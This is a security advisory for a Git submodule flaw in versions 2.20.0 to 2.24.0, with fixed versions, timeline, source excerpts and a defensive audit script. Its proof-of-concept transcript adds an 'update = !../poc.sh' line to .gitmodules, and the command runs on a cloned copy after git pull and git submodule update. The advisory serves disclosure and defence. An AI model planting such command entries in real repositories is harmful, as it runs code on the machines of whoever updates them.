Git submodule update command execution


A git submodule update operation can execute arbitrary shell commands defined in the .gitmodules file.

Affected products

  • Git versions 2.20.0 through 2.24.0

Fixed versions

  • Git v2.24.1, v2.23.1, v2.22.2, v2.21.1, v2.20.2

Disclosure timeline

  • 2019-11-11 Initial report to the git-security mailing list
  • 2019-12-10 Git v2.24.1, v2.23.1, v2.22.2, v2.21.1, v2.20.2 released

CVE number

Details

The git-submodule manual page documents the following configuration option for submodules:

The following update procedures are only available via the submodule.<name>.update configuration variable:

custom command: an arbitrary shell command that takes a single argument (the sha1 of the commit recorded in the superproject) is executed. When submodule.<name>.update is set to '!command', the remainder after the exclamation mark is the custom command.

This configuration value can be set in the .gitmodules file of a Git repository. However, when the --init flag is used, the setting is overridden.

The init_submodule function in builtin/submodule--helper.c takes care of this:

    /* excerpt from init_submodule(): the "update" setting is copied into
     * .git/config only when .git/config does not already have one */
    if (git_config_get_string(sb.buf, &upd) &&
        sub->update_strategy.type != SM_UPDATE_UNSPECIFIED) {
        if (sub->update_strategy.type == SM_UPDATE_COMMAND) {
            fprintf(stderr, _("warning: command update mode suggested for submodule '%s'\n"),
                sub->name);
            upd = xstrdup("none");
        } else

The code above sets the update strategy to none in the .git/config of the repository that contains the submodule.

The command is therefore only executed in a special case: git submodule update --init is invoked while .gitmodules carries no submodule.<name>.update strategy (so nothing is pinned in .git/config), a later commit sets the strategy to an external command in .gitmodules, and git submodule update is then run again without --init. Note that git clone --recurse-submodules performs that initial --init step, so an ordinary recursive clone followed by a pull leaves the repository in exactly this state.

Proof of concept

First, we prepare a repository:

    joern@hostname ~/tmp $ mkdir example
    joern@hostname ~/tmp $ cd example
    joern@hostname ~/tmp/example $ git init .
    Initialized empty Git repository in /home/joern/tmp/example/.git/
    joern@hostname ~/tmp/example $ git submodule add https://gitlab.com/joernchen/xxeserve.git
    Cloning into '/home/joern/tmp/example/xxeserve'...
    remote: Enumerating objects: 34, done.
    remote: Counting objects: 100% (34/34), done.
    remote: Compressing objects: 100% (29/29), done.
    remote: Total 34 (delta 14), reused 0 (delta 0)
    Unpacking objects: 100% (34/34), done.
    joern@hostname ~/tmp/example $ git commit -m "first commit"
    [master (root-commit) 9ed9add] first commit
     2 files changed, 4 insertions(+)
     create mode 100644 .gitmodules
     create mode 160000 xxeserve

So far there is nothing special about the repository:

    joern@hostname ~/tmp/example $ cat .gitmodules
    [submodule "xxeserve"]
    	path = xxeserve
    	url = https://gitlab.com/joernchen/xxeserve.git

Next, clone the repository:

    joern@hostname ~/tmp $ git clone --recurse-submodules example test
    Cloning into 'test'...
    done.
    Submodule 'xxeserve' (https://gitlab.com/joernchen/xxeserve.git) registered for path 'xxeserve'
    Cloning into '/home/joern/tmp/test/xxeserve'...
    remote: Enumerating objects: 34, done.
    remote: Counting objects: 100% (34/34), done.
    remote: Compressing objects: 100% (29/29), done.
    remote: Total 34 (delta 14), reused 0 (delta 0)
    Submodule path 'xxeserve': checked out 'c4a859fb16e2c65a1708d1c0a404f339191fd8e9'

Back in the original repository, we move the submodule to a different commit and introduce a command in .gitmodules (the path ../poc.sh is relative to the submodule directory, where the command is run):

    joern@hostname ~/tmp/example $ echo -e '#!/bin/bash\x0aid>/tmp/poc.txt' > poc.sh
    joern@hostname ~/tmp/example $ echo ' update = !../poc.sh' >> .gitmodules
    joern@hostname ~/tmp/example $ chmod +x poc.sh
    joern@hostname ~/tmp/example $ cd xxeserve
    joern@hostname ~/tmp/example/xxeserve $ git checkout 0f5c204
    Previous HEAD position was c4a859f Merge pull request #4 from mccabe615/master
    HEAD is now at 0f5c204 Update README.md
    joern@hostname ~/tmp/example/xxeserve $ cd ..
    joern@hostname ~/tmp/example $ git add .
    joern@hostname ~/tmp/example $ git commit -m 'second commit'
    [master ec3abce] second commit
     3 files changed, 4 insertions(+), 1 deletion(-)
     create mode 100755 poc.sh

In the cloned repository, the command runs after a git pull followed by git submodule update:

    joern@hostname ~/tmp/test $ git pull
    remote: Enumerating objects: 6, done.
    remote: Counting objects: 100% (6/6), done.
    remote: Compressing objects: 100% (3/3), done.
    remote: Total 4 (delta 1), reused 0 (delta 0)
    Unpacking objects: 100% (4/4), done.
    From /home/joern/tmp/example
     + 113237f...ec3abce master -> origin/master (forced update)
    Updating 9ed9add..ec3abce
    Fast-forward
     .gitmodules | 1 +
     poc.sh      | 2 ++
     xxeserve    | 2 +-
     3 files changed, 4 insertions(+), 1 deletion(-)
     create mode 100755 poc.sh
    joern@hostname ~/tmp/test $ git submodule update
    Submodule path 'xxeserve': '../poc.sh 0f5c2043db22ff091b800cb6c61e015492ad0885'
    joern@hostname ~/tmp/test $ cat /tmp/poc.txt
    uid=1000(joern) gid=1000(joern) groups=1000(joern),3(sys),90(network),98(power),991(lp),998(wheel)
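The condition described in the Details section and exercised by the proof of concept above (a `!command` update mode arriving in .gitmodules after the submodule was initialised, with nothing pinned in .git/config) can be checked for before running git submodule update on an untrusted checkout. The following pre-flight audit is an added example and is not code from the advisory or from Git itself; it parses the git-config style files with awk only, so it runs without a git binary, and the sample .gitmodules and .git/config contents it creates are constructed here to mirror the first and second commits of the transcript.

```shell
#!/bin/sh
# Added example, not part of the advisory: audit .gitmodules (and .git/config)
# before `git submodule update`. Uses only awk; git exposes the same keys via
# `git config -f .gitmodules --get-regexp '^submodule\..*\.update$'`.

# Print the names of all [submodule "name"] sections in a git-config style file.
submodule_names() {
    awk '/^[ \t]*\[submodule[ \t]+"/ {
            n = $0
            sub(/^[ \t]*\[submodule[ \t]+"/, "", n)
            sub(/"[ \t]*\][ \t]*$/, "", n)
            print n
        }' "$1"
}

# Print the `update` value recorded for submodule $2 in file $1 (empty if none).
update_mode() {
    awk -v want="$2" '
        /^[ \t]*\[submodule[ \t]+"/ {
            n = $0
            sub(/^[ \t]*\[submodule[ \t]+"/, "", n)
            sub(/"[ \t]*\][ \t]*$/, "", n)
            insec = (n == want); next
        }
        /^[ \t]*\[/ { insec = 0; next }
        insec && tolower($0) ~ /^[ \t]*update[ \t]*=/ {
            v = $0
            sub(/^[^=]*=[ \t]*/, "", v)   # keep everything after the first "="
            sub(/[ \t]+$/, "", v)
            print v
        }' "$1"
}

# Print "name<TAB>command" for every submodule whose update mode is a shell
# command (value starting with "!"), the construct the advisory abuses.
find_command_updates() {
    submodule_names "$1" | while IFS= read -r name; do
        mode=$(update_mode "$1" "$name")
        case "$mode" in
            '!'*) printf '%s\t%s\n' "$name" "${mode#!}" ;;
        esac
    done
}

# Print submodules of .gitmodules ($1) that .git/config ($2) does not pin:
# for these a changed .gitmodules decides the mode on the next `update`.
unpinned_submodules() {
    submodule_names "$1" | while IFS= read -r name; do
        [ -n "$(update_mode "$2" "$name")" ] || printf '%s\n' "$name"
    done
}

# Return 0 when the file carries no command update modes, 1 otherwise.
audit_gitmodules() {
    hits=$(find_command_updates "$1")
    if [ -n "$hits" ]; then
        printf 'refusing to run submodule update: command mode in %s\n' "$1" >&2
        printf '%s\n' "$hits" >&2
        return 1
    fi
    return 0
}

# Constructed samples (assumption: reconstructed from the transcript above).
# SAFE/MALICIOUS: .gitmodules before and after the "second commit".
# INITCFG: the .git/config entry a recursive clone of the safe state leaves
# behind (no update key). PINNED: what init_submodule writes when it sees a
# command mode at --init time.
make_samples() {
    SAFE=$(mktemp); MALICIOUS=$(mktemp); INITCFG=$(mktemp); PINNED=$(mktemp)
    cat > "$SAFE" <<'EOF'
[submodule "xxeserve"]
    path = xxeserve
    url = https://gitlab.com/joernchen/xxeserve.git
EOF
    cat > "$MALICIOUS" <<'EOF'
[submodule "xxeserve"]
    path = xxeserve
    url = https://gitlab.com/joernchen/xxeserve.git
    update = !../poc.sh
EOF
    cat > "$INITCFG" <<'EOF'
[submodule "xxeserve"]
    url = https://gitlab.com/joernchen/xxeserve.git
    active = true
EOF
    cat > "$PINNED" <<'EOF'
[submodule "xxeserve"]
    url = https://gitlab.com/joernchen/xxeserve.git
    active = true
    update = none
EOF
}

make_samples
if audit_gitmodules "$MALICIOUS"; then echo "clean"; else echo "blocked"; fi
echo "unpinned after a recursive clone of the safe state: $(unpinned_submodules "$MALICIOUS" "$INITCFG")"
echo "unpinned once init_submodule wrote update = none:   $(unpinned_submodules "$MALICIOUS" "$PINNED")"
rm -f "$SAFE" "$MALICIOUS" "$INITCFG" "$PINNED"
```

Run it as a hook or CI step from the superproject root with `audit_gitmodules .gitmodules`; a submodule listed by `unpinned_submodules .gitmodules .git/config` is one where the next `git submodule update` trusts whatever the freshly pulled .gitmodules says, which is the state the proof of concept relies on. Upgrading to a fixed Git version is the actual remedy; this audit only catches the `!command` form the advisory describes.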

External references

  • Git release announcement
  • https://about.gitlab.com/blog/2019/12/10/critical-security-release-gitlab-12-5-4-released/
  • https://gitlab.com/gitlab-com/gl-security/disclosures/blob/master/003_git_submodule/advisory.md

